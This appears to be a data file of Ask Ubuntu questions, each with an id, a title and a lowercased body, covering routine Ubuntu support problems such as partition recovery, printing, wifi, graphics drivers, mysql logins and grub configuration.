not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 792 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 791 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 795 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 794 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 907 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 906 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 1001 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 1000 was not found when attempting to remove it /dev/sdb : unrecognised disk label i have also tried and : ( parted ) print error : /dev/sdb : unrecognised disk label ( parted ) mklabel ( parted ) mklabel msdos ( parted ) rescue start ? 0 end ? 976773168 // this was just a random guess . information : a ntfs primary partition was found at 32.3kb - > 500gb . do you want to add it to the partition table ? yes/no/cancel ? yes ( parted ) quit information : you may need to update /etc/fstab . but after rescue i 've go this : radibg2 @ radibg2 : ~ $ sudo parted /dev/sdb gnu parted 2.3 using /dev/sdb welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) print error : /dev/sdb : unrecognised disk label ( parted ) mklabel new disk label type ? msdos ( parted ) mklabel msdos ( parted ) rescue error : /dev/sdb : unrecognised disk label ( parted ) also tried and low level format : dd if=/dev/zero of=/dev/sdb bs=1m and all above over but all the same again .
518723	ubuntu 14.04 cups problem	i recently upgraded from 12.04 to 14.04 on my laptop and i am not able to print on a network printer via cups anymore . if i run system-config-printer i get the error there was an error during the cups operation : 'bad request ' . if i run system-config-printer -- debug i get the following output : openprinting : init ( 'en_us ' , 'utf-8 ' ) 1 0 + < newprintergui object at 0x7ff964028460 ( newprinter+newprintergui at 0xea5ba0 ) > connected as user roberto + < printerpropertiesdialog object at 0x7ff964041dc0 ( printerproperties+printerpropertiesdialog at 0xf0b3a0 ) > < authconn.connection instance at 0x7ff964033830 > : operation += obtaining queue details authentication pass : 1 authentication : password callback set 1024 : u'bad request' if i instead run the command with sudo i can access the dialog and set the printers , but then the applications that do not run as root can not see the printers set by root . the variable cups_server is set and exported both by the .profile in my home directory and in /etc/profile . i googled unsuccessfully so far . i also reinstalled cups after having removed it with -- purge . any hint ?
518726	running remmina client at start up	i want to get ubuntu 14 lts to run a remmina client setup from boot up so that the user does not have to enter any information until they get to the remote desktop log on screen , any help would be good
518728	mysql : can only login from command line or as root	i 've been trying to solve this problem for the last 3h . i 've just set up a mysql server on my dedicated root server , running ubuntu 14.04-minimal . i have no problem logging in as root anywhere - it works just fine on the command line , phpmyadmin or a php-script . because i did not want to use all my scripts as the root user , i created a new one using this command : grant select , insert , update , delete , create , drop , alter on * . * 'myuser ' @ 'localhost ' identified by 'mypassword ' ; the user got successfully created and i can login with my password from the command line . however , it seems to be impossible to access mysql with another user than root from something that is not the commandline . at first i thought it might be the common host problem , where you have to use both % and localhost in the mysql.user database in order to access it from outside the console . but this did not work . i even added the two host entries that the root-user also has ( hostname , : :1 ) , but i always get the typical error # 1045 - can not log in to mysql server . what i 've also tried is to directly connect in my scripts ( or phpmyadmin ) to either the server 's ip-address or 127.0.01 instead of localhost - without success . so here is the current status : login as root from the console : works . login as root from anything else : works . login as myuser from the console : works . login as myuser from anything else : does n't work . does anyone have an idea what might cause this issue ?
518729	leoxsys usb wifi device not deteting in ubuntu	i have bought a leoxsys wifi usb device to use wifi in my pc . its working absolutely fine in windows7 as its provided with windows7 drivers . installing and using drivers in windows 7 is easy and its working fine . but coming to ubuntu linux 12.04lts its not working . actually i found drivers for all os 's in device 's official site . here is the link . but they did not provide any guide to how to install those drivers in linux . i am new to ubuntu , can any one help regarding this . i want create wifi hotspot with it . i tried aphotspot and some tutorials on the web , nothing worked . can any know the solution for my problem .
518731	my ubuntu desktop do n't work well	i tried to install gtk+ on ubuntu for learn gtk programing . before that ubuntu desktop was working well.when i installed it my ubuntu did n't work well.my themse , icons , bg , keyboard languages and ... set to deafault form.and i ca n't change any thing ( like back ground , fonts , themes , and other ) . then i install mate desktop.but on mate i have this problem too.how do i can solve it ? i run ub14.04 and it 's up to date . i upgrade it today .
518732	newb in need of help . brand new to computers	i just installed ubuntu 14.04 lts alongside windows 8.1 on my thinkpad twist . now i 'm planning on using ubuntu to learn python from learnpythonthehardway . but i have absolutely no idea how ubuntu works . i 've read tons of stuff but where do i start . i do n't know how to use terminal commands to download packages and at all for general use . i do n't like to copy and paste anything , instead rather learn , memorize , then do on my own and learn more as i move along . can someone give me a place to start , guides , what i need to know before i start messing around and messing up the os .
518734	edit polygon in ubuntu	i have a polygon in the following format : [ 813,1623 ] , [ 816,1623 ] , [ 818,1617 ] , [ 823,1626 ] , [ 831,1626 ] , [ 832,1629 ] , [ 839,1632 ] , [ 841,1636 ] , [ 837,1636 ] , [ 842,1640 ] , [ 839,1632 ] , [ 835,1631 ] , [ 831,1624 ] , [ 827,1621 ] , [ 827,1618 ] , [ 830,1620 ] , [ 838,1619 ] , [ 838,1618 ] , [ 832,1608 ] , [ 839,1605 ] , [ 841,1599 ] , [ 846,1596 ] , [ 848,1589 ] , [ 853,1588 ] , [ 855,1585 ] , [ 851,1579 ] , [ 853,1577 ] , [ 848,1574 ] , [ 837,1574 ] , [ 836,1568 ] , [ 835,1573 ] , [ 830,1573 ] , [ 829,1571 ] , [ 821,1571 ] , [ 827,1577 ] , [ 832,1577 ] , [ 822,1582 ] , [ 827,1584 ] , [ 827,1590 ] , [ 832,1591 ] , [ 833,1596 ] , [ 829,1598 ] , [ 831,1601 ] , [ 826,1601 ] , [ 826,1598 ] , [ 822,1600 ] , [ 825,1605 ] , [ 819,1603 ] , [ 820,1611 ] , [ 817,1610 ] , [ 820,1616 ] , [ 816,1615 ] , [ 816,1621 ] , [ 813,1619 ] , [ 813,1623 ] are there any applications i can convert this and edit it , i.e . inkscape ?
518738	i have privacy : record activity on but how to view log and all the stuff ?	where can i find the recorded data and screen snaps and etc things ? i had tried to find them within : ~/.local/share/zeitgeist directory but there are the following files available and i do n't know how to work with them to show all recorded data and history . activity.sqlite activity.sqlite-shm activity.sqlite-wal fts.index help me how to open and view the log . btw thanks in advance .
518740	ubuntu wifi problem	i 've recently installed ubuntu 14.04 and it 's good & nice but i 've still a problem and i 've tried all and it has n't work properly for example when i open many tasks like video in chrome and open skype and chat my wifi otomatic gets disconnected and after 2-3 minutes it 's asking me to enter the wifi password and i press on enter but it does n't connect and i have to restart my laptop i 've as wifi modell realtek rtl8723be i 'm would be happy if somebody can help me out of this problem . note : i 've gufw installed and activated . kind regards
518741	can not switch to another wifi connection	after reboot my computer connects to one of available wifi connections . when i try to switch to another wifi it can not connect . in top panel connecting animation is shown , then after 1 minute it says can not connect , then it continues trying to connect to another ones , but same thing . after 1 minute it says i can not connect . and even after it i try to connect to first one , which connected normally after reboot , it can not connect even to it . force reload , restart or stop/start network/networking , wifi or something like this do n't help . only reboot helps . cable internet also works normally when this problem appears . so problem is only about wireless . i tried to refresh my network drivers , libraries via synaptic pm , but no result . my ubuntu version : 14.04 , computer : asus zenbook ux31a . kernel version : 3.13.0-35-generic . p.s . there is no problem with wifi connections , as i can connect to them with another devices at the same time .
518743	vsftpd limit virtual users access	i have configured virtual users in vsftpd . let say i have created two virtual user vivek and sayali it is working fine my problem is sayali user has access to vivek 's and all system folders . how to remove this access ? i have uncommecnted the below line and restarted service chroot_local_user=yes getting this error 500 oops : vsftpd : refusing to run with writable root inside chroot ( )
518746	3 display configuration help with intel intergrated graphics - ubuntu 12.04 ( gnome classic or unity )	i 've been trying to set up my dock station with 3 displays with no luck . i have a i5 hp elitebook 8440p laptop docked on a hp vb043aa docking station that has a vga , a dvi and a display port . i have connected all three with my displays but i can only configure 2 at a time ... whenever i try to , i get windowed error messages ( which i fail to copy because metacity and compiz crash ) some of them are : '' failed to apply configuration : % s timout was reached '' i use ubuntu 12.04 x64 laptop specs : intel i5 m520 @ 2.4ghz 4gb ram raid 0 2x120gb ssd $ uname -a linux elitebook 3.13.0-35-generic # 62~precise1-ubuntu smp mon aug 18 14:52:04 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ sudo lshw -c video *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport:5050 ( size=8 ) $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 )
518750	ubuntu for android dual-boot samsung galaxy note 3	is there an offcial dual-booting procedure for ubuntu and android on the samsung galaxy note 3 that i can do because the whole `` desktop on your phone '' feature got me hooked ? !
518752	is there any advanced move command with gui-kinda interface	while downloading a file , in command-line , we have wget which shows us the progress of the download . similarly , is there any command which gives us visual status of the process ( move ) .
518753	impossible to get image back after hdmi connection	i have a lenovo u430 with intel family graphics ( i think 4400 ) and a nvidia card . i connected my 42 '' tv on the hdmi when the system was starting and the screen on the laptop became grey and the mouse pointer looks like a croos . i dont have picture in any of the two screens . if i restart , the problem still there . if i close the laptop and reopen , i can see a normal screen to put my password , but after that , it comes to grey again . i dont know what to do . : (
518755	unable to use word prediction with onboard keyboard	i can not use word prediction in the onboard on-screen keyboard . word prediction is turned on in settings and shows the word choices if no other program is used . when i open libre writer then onboard does not show the word choices any more . using ubuntu 14.04 . thank you for your help in advance .
518757	xrandr not working with nvidia	i have a problem . i have a lapop with an nvidia card and an intel one while i am using the nvidia one ( using prime profiles ) i can not change the display resolution using xrandr in terminal . all it does is that the display goes black for a second then back to the native resolution . however , when using the intel card it works without an issue . this is an issue for me because i play a lot of old games using wine and most of them have very low resolutions and so , when using nvidia , they are displayed on the top-left part of the screen , instead of being stretched to fill the whole screen like they do when using the intel card ( because the screen resolution will change to that of the game ) i also noticed that changing the resolution through system settings - > display works on both cards but it dose n't help much ... if i could get xrandr to change the resolution on the nvidia card then those games will work or if not then i could make a script to do it when the game launches and change back to the native one when it 's closed . my os is ubuntu 14.04 x64 and i use the up-to-date nvidia proprietary stable drivers . it 's a laptop if that matters edit : i just noticed that if i connect an external monitor ( vga1 ) i can change the resolution just fine on either monitor ... and the game now runs fullscreen ... but as soon as i disconnect it the issue comes back : (
518758	i ca n't find docky on my monitor	since i installed ubuntu as a dualboot on my acer extensa 5220 and installed docky on ubuntu , when ever i connect my laptop to my asus monitor the `` docky '' dock on the bottom is n't there anymore but on the laptop it still is . please help me fix this problem . thx
518761	update obstacle	background : i have two laptops , initially both with ubuntu lts 12.04 . when upgrading one , i accidentally turned off the machine . to recover from this , i created ( with the help of a friend ) a usb stick installation of 14.04 and did a fresh installation . the machine has been working fine ever since , aside from a small screen display problem . recently , using my other laptop , a dell with lts 12.04 on it , i inserted the usb stick which i had used to lts 14.04 on my other laptop into my dell . i was notified that it was read-only and i safely removed the usb stick . problem : today , i was notified on my dell laptop that there are updates from ubuntu . i proceeded to do the updates as i usually do and i received the following : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx cd/dvd 'ubuntu 14.04 lts trusty tahr - release amd64 ( 20140417 ) ' is required please insert the above cd/dvd into the drive '/media/cdrom/ ' to install software packages from it . xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx i clicked on the cancel button , instead of the continue button . the same error message occurred again . i again clicked on the cancel button and i was returned to the message inviting me to install updates . i clicked on that button and i given the message above . i cycled through this three times . i rebooted and tried again , without success . any help would be greatly appreciated . warning : i am a rank beginner .
518762	issues on asus f552ld notebook	i installed ubuntu 14.04.1 on my new laptop . but i have two issues that make me crazy . first , touchpad does n't work , and second some function keys do not nothing , such as the backlight regulator keys for display and wifi turn on/off . regard the touchpad i edit grub configuration so my touchpad emulates a ps/2 mouse , and so it works but it is n't good ! so this is my xinput list command output ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb2.0 hd uvc webcam id=10 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] and my laptop is an asus f552ld-sx219h but with the lshw command in the output it says that my motherboards is an x550ld , i think they are the same ! hope anybody can help me and sorry for my english !
518765	can not connect to internet after upgrade to ubuntu 14.04	i checked other answers but are not sure.hereby some output ~ $ ping google.com ping : unknown host google.com ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.112.128.1 0.0.0.0 ug 0 0 0 wlan0 10.112.128.0 0.0.0.0 255.255.252.0 u 9 0 0 wlan0
518766	no sound ubuntu 14.04 even after trying posted solutions	after upgrading from 12.04 i had no issues at all . after the first reboot/shutdown that is when i experienced problems . i have tried solutions here but none of them has worked . when i ran alsamixer in terminal , this is the output . i did get sound back after using a livecd with ubuntu on for a while until i had to boot the system following a kernel update . kindly assist to solve this issue . ( no sound from speakers or headphones )
518767	boot repair help with windows 8.1 and ubuntu	here is the link the boot-repair gave me : http : //paste.ubuntu.com/8206630/ i ran the default settings of boot-repair and it always stops and says `` grub-efi-amd64-signed purge canceled . please report this message to blah blah '' . i had previously setup my laptop to dual boot windows 8 and ubuntu . i recently upgraded to windows 8.1 and lost access to grub boot menu . i boot a live ubuntu flash drive , installed boot-repair and attempted to fix the problem with the default settings . before i use advance settings it recommends i give the above info to more experienced and knowledgeable users first because i could make the problem worse - i totally would . : ) any help appreciated . thanks ! computer specs : samsung np300e5c-a07us 4gb ram intel core i3-2370m 64-bit os
518769	where do i find drivers for my motherboard ?	i want to install ubuntu 14.04 64-bit , but the manufacturer only offers drivers for windows or dos but not for linux/ubuntu . specifically i am interested in lan drivers for the asus sabertooth z77 board what should i do ?
518772	software center has stopped working in ubuntu 14.04	previously i did not have any problem with software center . however suddenly when i open software center , an error message is shown : e : unable to parse package file /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en ( 1 ) , e : the package lists or status file could not be parsed or opened . and when i open it through terminal it shows error message as 2014-09-01 20:13:30,359 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-09-01 20:13:31,144 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-09-01 20:13:31,147 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-09-01 20:13:31,154 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-09-01 20:13:31,154 - root - error - could not find any typelib for launchpadintegration 2014-09-01 20:13:31,222 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-09-01 20:13:31,648 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-09-01 20:13:31,649 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 74 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 151 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : unable to parse package file /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en ( 1 ) , e : the package lists or status file could not be parsed or opened . 2014-09-01 20:13:33,561 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1378 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1316 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' please help me to solve this problem .
518773	why does putting laptop in suspend mode clear wifi hard block ?	i recently wrote a question regarding my asus x551ca laptop which is dual booted with windows 8.1 , and ubuntu 14.04 . the wifi functions perfectly when in windows , but is hard blocked in ubuntu . ( as confirmed via rfkill list all command ) . after reviewing many `` ask ubuntu '' posts , i found several that suggested going into suspend mode to clear the hard block , and enable the wifi connection . after testing this procedure several times , the results confirmed that it worked every time , and is my current start-up work around to enable wifi . although this procedure enables my wifi , i need to fix the root cause , so i am asking the question : `` why does putting the laptop in suspend mode clear the wifi hard block ? '' is it the bios boot sequence ? do i need to have the network card load first before the ubuntu hard drive boot disk sector ? if anyone is familiar with this process i look forward to reading your post .
518775	resolution drops upon wake from suspend - 14.04	whenever i wake my computer from suspend , the resolution is significantly lower than where i have it set . however , if i simply open system settings , the resolution instantly resets itself to where it should be ( 1280x1024 ) . any idea why this might be happening ? i 'm running 14.04 lts . i have an nvidia geforce 8800 gt , and i 'm using the latest recommented nvidia binary driver , 331.38 ( proprietary , tested ) .
518778	ubuntu 14.04 - radeon driver - hd 4770 card - crash when hdtv as second monitor turns on	i 've been having problems trying to use my lg hdtv ( 42lb6300 ) as a second monitor . when i try turning the hdtv on , the computer crashes . the dual screen will work for a few seconds and then ubuntu just reboots without any messages or errors . the same thing happens when i try booting with the tv on . it will work for a few seconds and then reboot again . from what i 've read it may be to due poor open source radeon driver performance . however , i can not use amd proprietary drivers because hd 4770 drivers are legacy and not compatible with x server . i 'm having great difficulty trying to figure out what is wrong . any help or guidance in debugging this issue would be greatly appreciated .
518781	installing nvidia driver on dell	i have a dell xps 14 l421x that i have loaded ubuntu on , but for the life of me i can not get the nvidia propritery drivers installed . the system has the onboard intel apu , as well as an nvidia gt630m . i have encryption enabled and with the nv drivers installed , after i enter in the key the display freezes . however i can do a shift+f1 and get to a terminal without issue . if i remove the drivers , x starts like normal . i 've tried installing the drivers via the `` additional drivers '' function , as well as manually via apt . any help would be greatly appreciated . thank you
518789	what 's the command to send sms on ubuntu with sms server tools ?	i correctly installed and configured sms server tools 3 from repository on a server ( i see in the log software correctly communicates with modem ) . on my pc i installed sms server tools 3 downloading it from the site and then i use sendsms and it works , on server i got the message . this procedure did n't work on server so i found and tried to use repository . `` the program 'sendsms ' is currently not installed . you can install it by typing : sudo apt-get install gnokii-cli ''
518793	how to fix 14.04.1 server installation error ?	hi i am trying to install ubuntu 14.04.1 server edition on my desktop . i am able to get the install cd to load and select the install ubuntu server option . after selecting install ubuntu server my screen goes black and nothing happens . i tried installing off of a verfified working 12.04 install disc and the same error happened with the blank screen . i have an asus mobo and a intel e6570 core2duo cpu installed with 3 gb ram , so not sure why i am having problems . anybody have a suggestion ? the disc seems to be working on my 64 bit amd desktop but whenever i try on the 64 bit intel desktop i can not get past second page . i thought ubuntu server was supposed to work on all 64 bit architectures ?
518795	postfix+opendkim : how to reject untrusted domains without keeping mails in queue ?	we needed to create a smtp server for our webapps . this server turns under ubuntu with postfix and opendkim . we have 40 domains with 40 dkim keys . my config is the same as described here : http : //blog.tjitjing.com/index.php/2012/03/guide-to-install-opendkim-for-multiple-domains-with-postfix-and-debian.html . it works just fine . my problem : if developpers create an email with a domain my server does n't know in the trusted list , it will send it , and bloc the mail between 2 ans 3 minutes . can i do something to make postfix reject untrusted mails in the second ? 1 ) i 've tried in opendkim conf `` adspnosuchdomain=true '' and `` adspaction=reject '' . my mail are rejected , but still waiting in queue 2-3 minutes . 2 ) i 've found nothing usable in postfix to bloc these domains . does anyone have an idee on how to proceed in my case ? thanks for your help .
518796	update-grub ignores grub_cmdline_linux in /etc/default/grub when generating menu.lst	i created /etc/default/grub with the contents grub_cmdline_linux= '' cgroup_enable=memory swapaccount=1 '' . when i run update-grub , i expect these additional arguments to be appended to the kernel lines in /boot/grub/menu.lst . but it never works . i tried several variants ( grub_cmdline_ { xen , linux } { _default } ) but no luck . the file /etc/default/grub does get executed , tried it with an test echo output . when ( un ) installing kernels , menu.lst always gets updated . but the above arguments are always ignored . do you have any ideas to debug this ? i 'm out of ideas . system info : ubuntu 14.04 x64 grub 0.97-29ubuntu66 it 's an xen domu booted via pvgrub64
518797	location of persistent files in bootable usb	i have created a bootable usb of ubuntu using startup-disk-creator and added the persistence of around 2gb on the usb..i booted through the usb . i downloaded some documents made some changes and saved the documents . now when i try to boot from that usb i am getting some kind of boot error . i can format the usb and make it bootable once again that is not an issue but i need those documents . where are they stored ? how can i retrieve those without booting from that usb ? thanks a lot !
518799	loggin on to unbuntu after new install	i installed unbuntu 13.04 four times . after each installation i attempted to log in by clicking log-in instead of guest . in this field i typed the user name and password i established at the beginning of each installation . each and every time i received the error message that my password was invalid . i wrote down each user name and password i established and i verified that each one was correct several times . i made several attempts to log in this way and i was never successful . i can enter as a guest but then i do n't have access to administrator privileges so i can connect to my wifi . when i try to connect with my wifi i get the authentication window and i do n't have that password so i get now where . i read through many previous posts on this web site to no avail . what am i doing wrong ?
518804	mpd youtube stream buffering	i have modified greasemonkey youtube script , adding button to play audio using mpd on dedicated box . it works ok . i have used classic mpc add `youtube-dl -- prefer-insecure -f140 -g $ 1` type command . i have made this for listening few hours long mixes . but for this long videos it takes few minutes ( like 10 minutes ) to load and play , which is rather unconvenient . i have n't detected any other abnormalities . can this loading phase be speeded up ?
518806	set ip address and stuff on ubuntu	how can i set ip address , subnet mask , default gateway , preferred dns server and alternative dns server on ubuntu 14.04 ? thank you
518807	encryption phassphrase	when i installed ubuntu and first logged in , it gave me a chance to pick an encryption passphrase . i did not do it at that time , but i want to now . i am not getting the option . what do i need to do ?
518808	connection of phone to ubuntu laptop through data cable	ubuntu 14.04 is unable to read my lumia 520 , it shows phone plugged in then gets disconnected . it is continuously repeated . also when i use $ lsusb command in terminal it shows nokia lumia 920 there .
518810	how can i automatically select a new background when my external monitor disconnects ?	i have this image : currently , this is stretched across two monitors ( connected via vga ) and it works perfectly . what i want to be able to do is , when i disconnect my monitor , be able to switch to a cropped version of that image automatically ( because i 've played around with settings which have gotten me no where ) . this is the image i want to switch to , so you get an idea ... is there software or script ... some kind of solution for ubuntu 14.04 that will assist in this ? edit : this is what it would look like if i do n't change the settings : if i do change it , i ca n't get anything better than : ( text all squashed together ) -or- ( zoomed to center )
518812	drive name in windows	i have windows 8.1 and ubuntu installed . if i change the ubuntu partition name in windows , will that cause me problems in ubuntu ( or windows ) ? i 'll add that windows 8.1 was installed on the machine and i first partitioned the drive in windows before installing ubuntu . now , i want to change the drive name in windows . i can not imagine this is a problem , but i 'd rather ask than find out how limited my imagination is the hard way . thank you !
518814	setting keyboard shortcuts within ubuntu 12.04 ( compose shortcut not available )	i use ubuntu studio 12.04 as a fusion vm under mac osx mavericks . i have been trying to define a shortcut key to snap a window to the left half or right half of the screen . i can do this with a cursor move and would like to do it with keystrokes . i open up settings manager -- > window manager -- > keyboard and i can see the actions and shortcuts columns i doubleclick on an action and a popup opens but the compose shortcut tool mentioned in the help file does not appear . therefore i can not change or reassign any of these . steps i have taken : i have looked at align windows with keyboard shortcuts ? and the other links suggested in it along with several other searches per above , i can get to the settings window but ca n't change the setting i have tried compiz several times and have not been able to get it to work stably . too many of its features conflict with one another or my underlying system . this i have logged in using ubuntustudio and xfce options at the login prompt . there is no difference in settings menu behavior
518815	compare files in loop	i have a folder testcases , with various subfolders . in each subfolder there are 3 files : testcase.csv testcase64.csv testcasemac.csv . how do i loop through all the subfolders and compare 3 files in each folder - whether the three files have the same content or different ?
518816	is ubuntu viable for a company of 5 employees and 20 or so clients ?	linux appears to be a viable solution for my new and growing business . the problem is that i am having an impossible time learning if it should be what i invest in without running into a sustained barrage of geek language ( juju ? ? yum ? ? stop it with the weird names already it 's very distracting ) . i am hoping for answers at the business owner level . can i set it up and let it run with a modest ( meaning business owner level not full time it fluent linuxer that goes to all the tech conferences ) amount of effort ? can i set up my own cloud of collaboration for my team and clients ? do i have to have my entire team switch to libreoffice ? online meetings . top priority . can i host my own online meetings or do i have to find a cloud solution like webex or join.me ? desperately want to escape the insanity of microsoft but i do n't want to doom my new and growing business with an immature or unwieldy solution . thanks .
518817	automatically login for all users	i do n't know , whether this is possible , but ... since i have lvm-encrypted my entire disk , i see no reason to type another password to login right after startup . however , at the moment i have two user accounts on my laptop . one for business and one for private stuff . i like things separated like this . is there a way , i can enable password-free login after startup for both accounts ? i mean in such a way that i can choose the account . i do n't want to remove my user password . i 'm running kubuntu 14.04 , but i think , this should n't be any different to ubuntu , since both use lightdm . thanks in advance , cheers , doublerainbow64
518819	how can i run the slideshow in a specified order ?	i would like to view the images for example from the oldest until the newest . this is not possible with many viewers i tried ( mirage , shotwell , gnome image viewer ) .
518822	trackpad does n't work after suspend	ubuntu 14.04 and a fujitsu lifebook u-series.i ca n't get trackpad to work after suspend bluetooth mouse does.sorry to say that trackpad did n't work form the beginning but my son googled something and edited something and got it to work . trackpad works fine if i reboot or start the computer from scratch , two finger scrolling and so forth . need some help to search what goes wrong .
518824	network printer found and drivers installed , not printing from ubuntu 14.04	i was able to find and connect to my canon mg6320 printer from my ubuntu 14.04 computer using the gui . i clicked : system settings > printers > add and everything worked fine until i tried to print a `` test page '' . nothing comes out . the printer does beep once , but that 's it . i now have 5 or 6 test pages in cue from my ubuntu computer . i am sure the printer is working because i am able to print from it using my wife 's windows 7 computer ( still trying to convert her to linux ) . i should also say that this printer is connected to my router , and both computers are also connected to my router so i think that makes it a `` local area network printer '' . anyway , thank you very much for taking the time to read this and help !
518832	how do i change battery charge back to 100 % when it only charges to 80 %	i have recently uninstalled windows 8.1 from my toshiba laptop , but left the `` battery life cycle '' in toshiba eco utility turned on , which limits my battery charge to 80 % . i do not have windows recovery disk nor recovery partitions and so i can not reinstall windows to disable it again . i can not find anything like `` battery charge settings '' etc . in bios the model is toshiba satellite c55-a-1h9 and ubuntu 14.04 how do i disable the 80 % charge limit ? i mostly use my laptop without my charger plugged in now and it is quite limiting . i know there were plenty of similar threads about this issue , but none of them really helped me solve my problem and i 'm out of ideas .
